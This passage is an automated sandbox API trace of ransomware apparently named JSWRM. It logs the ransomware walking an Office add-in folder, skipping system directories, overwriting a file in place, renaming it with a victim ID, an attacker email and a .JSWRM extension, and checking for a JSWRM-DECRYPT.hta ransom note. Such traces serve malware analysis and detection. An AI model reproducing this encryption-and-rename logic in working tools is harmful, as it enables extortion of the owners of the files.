lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0125.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0125.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0125.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0125.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0125.644] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6224b6a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6224b6a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17040, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0125.644] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0125.644] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0125.644] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0125.644] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0125.644] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0125.644] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0125.644] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0125.644] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.644] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0125.644] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0125.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0125.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0125.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0125.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0125.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0125.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0125.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0125.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0125.644] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc240ad7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc240ad7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2b31ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13ad8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0125.644] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0125.644] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0125.645] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0125.645] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0125.645] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0125.645] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0125.645] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0125.645] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.645] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0125.645] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0125.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0125.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0125.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0125.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0125.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0125.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0125.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.645] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7b9ee02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7b9ee02, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7bc5054, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x7aa8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0125.645] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0125.645] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0125.645] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0125.645] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0125.645] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0125.645] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0125.645] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0125.645] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.645] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0125.646] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0125.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0125.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0125.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0125.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0125.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0125.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ef08 [0125.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0125.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0125.646] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x161d962a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x161d962a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x161ff8f9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x52560, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.uk.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0125.646] lstrcmpiW (lpString1="PowerViewRes.uk.xap", lpString2=".") returned 1 [0125.646] lstrcmpiW (lpString1="PowerViewRes.uk.xap", lpString2="..") returned 1 [0125.646] lstrcmpiW (lpString1="PowerViewRes.uk.xap", lpString2="...") returned 1 [0125.646] lstrcmpiW (lpString1="PowerViewRes.uk.xap", lpString2="windows") returned -1 [0125.646] lstrcmpiW (lpString1="PowerViewRes.uk.xap", lpString2="recovery") returned -1 [0125.646] lstrcmpiW (lpString1="PowerViewRes.uk.xap", lpString2="perflogs") returned 1 [0125.646] lstrcmpiW (lpString1="PowerViewRes.uk.xap", lpString2="documents and settings") returned 1 [0125.646] lstrcmpiW (lpString1="PowerViewRes.uk.xap", lpString2="$RECYCLE.BIN") returned 1 [0125.646] lstrcmpiW (lpString1="PowerViewRes.uk.xap", lpString2="system volume information") returned -1 [0125.646] lstrcmpiW (lpString1="PowerViewRes.uk.xap", lpString2="msocache") returned 1 [0125.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.uk.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0125.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.uk.xap", cchWideChar=19, lpMultiByteStr=0x241010, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.uk.xap", lpUsedDefaultChar=0x0) returned 19 [0125.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.uk.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0125.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.uk.xap", cchWideChar=19, lpMultiByteStr=0x2410d8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.uk.xap", lpUsedDefaultChar=0x0) returned 19 [0125.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0125.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0125.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0125.647] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\uk\\PowerViewRes.uk.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\uk\\powerviewres.uk.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.647] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=337248) returned 1 [0125.648] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0125.648] ReadFile (in: hFile=0x338, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0125.663] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.663] WriteFile (in: hFile=0x338, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0125.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.663] CloseHandle (hObject=0x338) returned 1 [0125.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0125.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0125.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0125.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0125.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0125.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0125.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0125.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0125.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.664] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\uk\\PowerViewRes.uk.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\uk\\powerviewres.uk.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\uk\\PowerViewRes.uk.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\uk\\powerviewres.uk.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0125.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0125.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0125.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0125.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0125.665] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x161d962a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x161d962a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x161ff8f9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x52560, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.uk.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0125.665] FindClose (in: hFindFile=0x232180 | out: hFindFile=0x232180) returned 1 [0125.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0125.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0125.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0125.665] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf637b042, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x161d962a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x161d962a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="vi", cAlternateFileName="")) returned 1 [0125.665] lstrcmpiW (lpString1="vi", lpString2=".") returned 1 [0125.665] lstrcmpiW (lpString1="vi", lpString2="..") returned 1 [0125.666] lstrcmpiW (lpString1="vi", lpString2="...") returned 1 [0125.666] lstrcmpiW (lpString1="vi", lpString2="windows") returned -1 [0125.666] lstrcmpiW (lpString1="vi", lpString2="recovery") returned 1 [0125.666] lstrcmpiW (lpString1="vi", lpString2="perflogs") returned 1 [0125.666] lstrcmpiW (lpString1="vi", lpString2="documents and settings") returned 1 [0125.666] lstrcmpiW (lpString1="vi", lpString2="$RECYCLE.BIN") returned 1 [0125.666] lstrcmpiW (lpString1="vi", lpString2="system volume information") returned 1 [0125.666] lstrcmpiW (lpString1="vi", lpString2="msocache") returned 1 [0125.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0125.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0125.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0125.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0125.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0125.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0125.666] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\vi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\vi\\jswrm-decrypt.hta")) returned 0xffffffff [0125.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0125.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.667] RtlAllocateHeap 